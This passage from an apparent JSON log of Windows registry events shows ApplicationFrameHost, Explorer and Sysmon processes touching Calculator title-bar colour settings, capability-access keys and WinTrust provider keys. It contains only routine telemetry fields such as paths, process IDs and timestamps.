"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573249800000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - 
"timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": 
"Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - 
"event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": 
"C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883573249950016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573249950016, - "unique_pid": 
